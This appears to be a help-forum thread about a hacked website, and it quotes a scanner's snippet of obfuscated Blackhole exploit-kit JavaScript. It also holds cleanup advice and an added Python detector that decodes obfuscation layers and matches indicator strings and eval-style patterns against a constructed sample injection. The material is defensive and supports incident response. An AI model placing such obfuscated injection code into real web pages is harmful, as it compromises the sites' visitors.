
Possible Duplicate:
My server’s been hacked EMERGENCY

My web application has been hacked and I am trying to remove the malware/code injection.

Scanning it through http://sitecheck.sucuri.net says:

Known javascript malware.

Details: http://labs.sucuri.net/db/malware/malware-entry-mwexploitkitblackhole1?v20<script>v=window;try{dsfsd++}catch(wEGWEGWEg){try{(v+v)()}catch(fsebgreber){try{v["document"]["body"]="123"}catch(gds){m=123;if((alert+"").indexOf("native")!==-1)ev=window["e"+"val"];}}

I have searched the code with grep for strings from the above Details, like "wEGWEGWEg" and "fsebgreber", but got nothing.

I scanned the application with iscanner and it detected the following remote source.

[2.3] ((?:.*?</script>)?) Javascript code from remote source detected.

<script type="text/javascript" src="https://tq935.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=afde567bd5e0bd8d2b40870206901b9b"></script>

I need help removing the code injections.

user105566
  • Best thing to do is nuke it and restore from a backup and then patch, patch, patch! – Zapto Oct 26 '12 at 11:40
  • Make sure it's a backup from *before* you were compromised. And to be sure that you're doing that, you have to figure out *how* and *when* you were compromised. – Ladadadada Oct 26 '12 at 11:56

1 Answer

There are two common scenarios and one outside possibility...

  1. The harmful code has been added to the pages (and has most likely been encoded), so it won't be in plain text and easily readable. You'd need to find some text from that script and remove it from that page, then search all of the other pages.

  2. It's a SQL injection attack and the harmful code/script actually resides in your SQL database.

  3. Code could be added in both places.

As others have suggested, the cleanest, safest, non-hands-on removal would be to restore from a clean backup (database & website files). The other option, depending on your experience, is to go through and manually clean things up.

To find out how the compromise occurred, it will take time, but the first few things are to consider vulnerable 3rd-party scripts/plugins, your own hand-written code, file/image upload scripts, and a compromised user account. I'd change your passwords for all of the accounts you use on the site as a starting point. I'd also confirm you're running the latest version of WP, but most likely the attack came in from one of the plugins.

If you want to work on figuring out how the injection happened, before you restore the site, download the entire site/code and run it locally. Just realize that you're running a compromised website/code on your computer; understand the ramifications. There are vulnerability assessment programs/scanners, as well as freelancers, that can help locate potential holes in the website.

bmurtagh
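The answer's first two scenarios explain why the asker's grep for "wEGWEGWEg" found nothing: an injected script is usually stored encoded (base64 inside `eval(atob(...))`, `\xNN` or `\uNNNN` escapes, `String.fromCharCode(...)`, percent-encoding), and it may sit in a database column rather than in a file. The script below is an added example, not code from the original post or from Sucuri or iscanner: it peels those encoding layers off page content and database rows and only then looks for the marker strings from the scanner report. The page files, the `posts` table (an SQLite stand-in for a WordPress `wp_posts` table) and the injected payloads are all constructed inline; the only marker strings taken from the page are `wEGWEGWEg`, `fsebgreber` and `dsfsd++`.

```python
# Added example: find obfuscated JavaScript injections in web files and
# database rows. Hypothetical helper, not from the original post or from
# any scanner named on the page. All sample data below is constructed.
import base64
import re
import sqlite3
import urllib.parse

# Plain-text markers from the scanner report; never present as-is in the
# stored (encoded) form of the injection.
IOC_STRINGS = ["wEGWEGWEg", "fsebgreber", "dsfsd++"]
# Constructs that obfuscated injections typically use; the last one is the
# window["e"+"val"] trick that appears in the report.
SUSPICIOUS_PATTERNS = [
    r"\beval\s*\(", r"String\.fromCharCode", r"unescape\s*\(",
    r"document\.write\s*\(", r"\[\s*['\"]e['\"]\s*\+\s*['\"]val['\"]\s*\]",
]


def _decode_once(text):
    """Strip one layer of common JS obfuscation; keep the original text too."""
    out = text
    # String.fromCharCode(118, 61, ...) -> the characters it builds
    out = re.sub(r"String\.fromCharCode\s*\(([\d\s,]+)\)",
                 lambda m: "".join(chr(int(n)) for n in re.findall(r"\d+", m.group(1))), out)
    # \xNN and \uNNNN escapes
    out = re.sub(r"\\x([0-9a-fA-F]{2})", lambda m: chr(int(m.group(1), 16)), out)
    out = re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), out)
    # %77%45... percent-encoding (as fed to unescape())
    out = urllib.parse.unquote(out)
    # long base64 runs: append the decoded form if it is readable text
    for run in re.findall(r"[A-Za-z0-9+/]{24,}={0,2}", out):
        try:
            dec = base64.b64decode(run, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            continue
        if all(c.isprintable() or c in "\r\n\t" for c in dec) and dec not in out:
            out += "\n" + dec
    return out


def decode_layers(text, max_rounds=4):
    """Apply _decode_once until nothing changes (handles nested encodings)."""
    for _ in range(max_rounds):
        nxt = _decode_once(text)
        if nxt == text:
            break
        text = nxt
    return text


def find_indicators(text):
    """Return marker strings and suspicious patterns found after decoding."""
    decoded = decode_layers(text)
    hits = [s for s in IOC_STRINGS if s in decoded]
    hits += [p for p in SUSPICIOUS_PATTERNS if re.search(p, decoded)]
    return hits


def scan_files(files):
    """files: {path: content}. Returns {path: indicators} for hits only."""
    return {p: find_indicators(c) for p, c in files.items() if find_indicators(c)}


def make_db(rows):
    """Constructed in-memory stand-in for a wp_posts table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, post_content TEXT)")
    conn.executemany("INSERT INTO posts VALUES (?, ?)", rows)
    return conn


def scan_db(conn):
    """Decode and check every row; on a large table prefilter with LIKE '%<script%'."""
    hits = {}
    for row_id, content in conn.execute("SELECT id, post_content FROM posts"):
        found = find_indicators(content or "")
        if found:
            hits[row_id] = found
    return hits


# Constructed payload reusing the marker names from the report.
PAYLOAD = "v=window;try{dsfsd++}catch(wEGWEGWEg){try{(v+v)()}catch(fsebgreber){}}"


def build_samples():
    """Constructed sample site: one base64 injection in a file, one hex-escaped in the DB."""
    b64 = base64.b64encode(PAYLOAD.encode()).decode()
    hexed = "".join("\\x%02x" % ord(c) for c in PAYLOAD)
    files = {
        "index.php": "<html><body><h1>Home</h1></body></html>",
        "footer.php": '</div><script>eval(atob("%s"))</script></body>' % b64,
    }
    rows = [
        (1, "<p>Welcome to our site</p>"),
        (2, '<p>Contact us</p><script>eval("%s")</script>' % hexed),
    ]
    return files, rows


if __name__ == "__main__":
    files, rows = build_samples()
    print("files:", scan_files(files))
    print("db rows:", scan_db(make_db(rows)))
```

Run against a real site by reading every `.php`, `.js` and `.html` file into the `files` dict and pointing `scan_db` at a dump of the content tables; on MySQL the equivalent first pass is `SELECT ID FROM wp_posts WHERE post_content LIKE '%<script%'`. A hit only tells you where the injection lives, not how it got there, so the backup-and-patch advice in the answer still applies after cleanup.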